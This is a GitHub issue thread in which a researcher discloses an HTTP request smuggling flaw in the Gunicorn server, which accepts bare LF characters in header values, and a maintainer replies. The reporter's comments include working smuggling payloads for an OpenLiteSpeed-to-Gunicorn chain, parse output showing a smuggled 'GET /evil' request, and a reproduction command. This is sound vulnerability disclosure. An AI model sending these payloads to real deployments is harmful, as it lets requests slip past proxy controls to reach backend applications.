benoitc / gunicorn

gunicorn 'Green Unicorn' is a WSGI HTTP Server for UNIX, fast clients and sleepy applications.
http://www.gunicorn.org
Other
9.86k stars 1.75k forks source link

fix header value to be compliant with new RFC 9110 #3144

Closed kenballus closed 3 months ago

kenballus commented 9 months ago

I reported this privately on June 2, so I'm reporting it publicly now.

Try sending Gunicorn the following payload:

GET / HTTP/1.1\r\n
Host: a\r\n
Useless:\n\nGET / HTTP/1.1\nHost: a\r\n
\r\n

Gunicorn will see an HTTP request with two headers, (b'host', b'a'), and (b'useless', b'\n\nGET / HTTP/1.1\nHost: a').

Since the \ns persisted into the header value, this technically violates RFC 9110, which says this:

Field values containing CR, LF, or NUL characters are invalid and dangerous, due to the varying ways that implementations might parse and interpret those characters; a recipient of CR, LF, or NUL within a field value MUST either reject the message or replace each of those characters with SP before further processing or forwarding of that message.

Gunicorn will also violate this rule when it receives a header containing \x00 or \r.

However, the more interesting consequence of this bug is that some HTTP proxies (lookin' at you, OpenLiteSpeed) accept and forward bare LF line endings without normalizing them into CRLFs. This renders Gunicorn vulnerable to request smuggling when used in conjunction with those servers.

benoitc commented 9 months ago

This renders Gunicorn vulnerable to request smuggling when used in conjunction with those servers.

Which chain expose that ? Do you have any diagram ? Was it tested on latest master?

kenballus commented 9 months ago

Yes, this was tested on the latest master.

Any proxy that doesn't normalize LF into CRLF as a header line terminator would work. This is a pretty easy mistake to make. One proxy that makes this mistake is OpenLiteSpeed.

So the chain would be this: Client -> OpenLiteSpeed -> Gunicorn

benoitc commented 9 months ago

WSGI applications must check there header to be safe. I don't see in the current example how an application could be in atatcked unless it's using an header like this. We protect already against long lines.

However it's true we should be compliant with the HTTP RFC. A fix for it is needed.

kenballus commented 9 months ago

I don't see in the current example how an application could be in atatcked unless it's using an header like this. We protect already against long lines.

I'll give you a PoC then.

Suppose you have OpenLiteSpeed acting as a reverse proxy for Gunicorn.

OpenLiteSpeed treats \n as a line ending in field-lines. This is permitted by RFC 9112 section 2.2:

Although the line terminator for the start-line and fields is the sequence CRLF, a recipient MAY recognize a single LF as a line terminator and ignore any preceding CR.

When OpenLiteSpeed forwards a request that uses single LF as a line ending, it does not translate that LF into a CRLF. This is a violation of RFC 9110 section 2.2:

A sender MUST NOT generate protocol elements that do not match the grammar defined by the corresponding ABNF rules. Within a given message, a sender MUST NOT generate protocol elements or syntax alternatives that are only allowed to be generated by participants in other roles (i.e., a role that the sender does not have for that message).

Gunicorn allows LF bytes within header values. This is a violation of the RFC, as noted in the previous entries of this thread.

This discrepancy allows for request smuggling to Gunicorn past OpenLiteSpeed. Here's a payload that executes request smuggling on OpenLiteSpeed <-> Gunicorn:

GET / HTTP/1.1\r\nTest: a\nContent-Length: 22\r\n\r\nGET /evil HTTP/1.1\r\n\r\n

OpenLiteSpeed parses the payload like this:

[
    HTTPRequest(
        method=b'GET', uri=b'/', version=b'1.1',
        headers=[
            (b'content-length', b'22'),
            (b'test', b'a'),
        ],
        body=b'GET /evil HTTP/1.1\r\n\r\n',
    ),
]

(i.e. it sees one GET request for / with a 22-byte message body)

It therefore forwards the following to Gunicorn:

GET / HTTP/1.1\r\nTest: a\nContent-Length: 22\r\nAccept-Encoding: gzip\r\nX-Forwarded-For: 172.19.0.1\r\n\r\nGET /evil HTTP/1.1\r\n\r\n

Gunicorn interprets this as follows:

[
    HTTPRequest(
        method=b'GET', uri=b'/', version=b'1.1',
        headers=[
            (b'accept_encoding', b'gzip'),
            (b'test', b'a\nContent-Length: 22'),
            (b'x_forwarded_for', b'172.19.0.1'),
        ],
        body=b'',
    ),
    HTTPRequest(
        method=b'GET', uri=b'/evil', version=b'1.1',
        headers=[],
        body=b'',
    ),
]

(i.e. it sees two GET requests, one for / with an empty message body, and another for /evil)

This is request smuggling. If you want to reproduce these results for yourself, you can do so by installing the HTTP Garden, starting it up, and running the following command in the repl:

servers ols gunicorn; transducers ols_proxy; payload 'GET / HTTP/1.1\r\nTest: a\nContent-Length: 22\r\n\r\nGET /evil HTTP/1.1\r\n\r\n'; transduce; fanout

The output should look something like this:

[1]: 'GET / HTTP/1.1\r\nTest: a\nContent-Length: 22\r\n\r\nGET /evil HTTP/1.1\r\n\r\n'
    ⬇️ ols_proxy
[2]: 'GET / HTTP/1.1\r\nTest: a\nContent-Length: 22\r\nAccept-Encoding: gzip\r\nX-Forwarded-For: 172.19.0.1\r\n\r\nGET /evil HTTP/1.1\r\n\r\n'
ols: [
    HTTPRequest(
        method=b'GET', uri=b'/', version=b'1.1',
        headers=[
            (b'accept-encoding', b'gzip'),
            (b'content-length', b'22'),
            (b'test', b'a'),
            (b'x-forwarded-for', b'172.19.0.1'),
        ],
        body=b'GET /evil HTTP/1.1\r\n\r\n',
    ),
]
gunicorn: [
    HTTPRequest(
        method=b'GET', uri=b'/', version=b'1.1',
        headers=[
            (b'accept_encoding', b'gzip'),
            (b'test', b'a\nContent-Length: 22'),
            (b'x_forwarded_for', b'172.19.0.1'),
        ],
        body=b'',
    ),
    HTTPRequest(
        method=b'GET', uri=b'/evil', version=b'1.1',
        headers=[],
        body=b'',
    ),
]
benoitc commented 9 months ago

please keep the topic title as is. We need to handle a new badly thought RFC that introduces this issue. This will be fixed.

kenballus commented 9 months ago

This attack has always been possible. The new RFCs require implementations to protect against it, and the older ones didn't.

The new RFCs don't introduce this issue; they address it.

Changing the title makes it seem like this issue is about rules lawyering, when it is in fact an exploitable bug.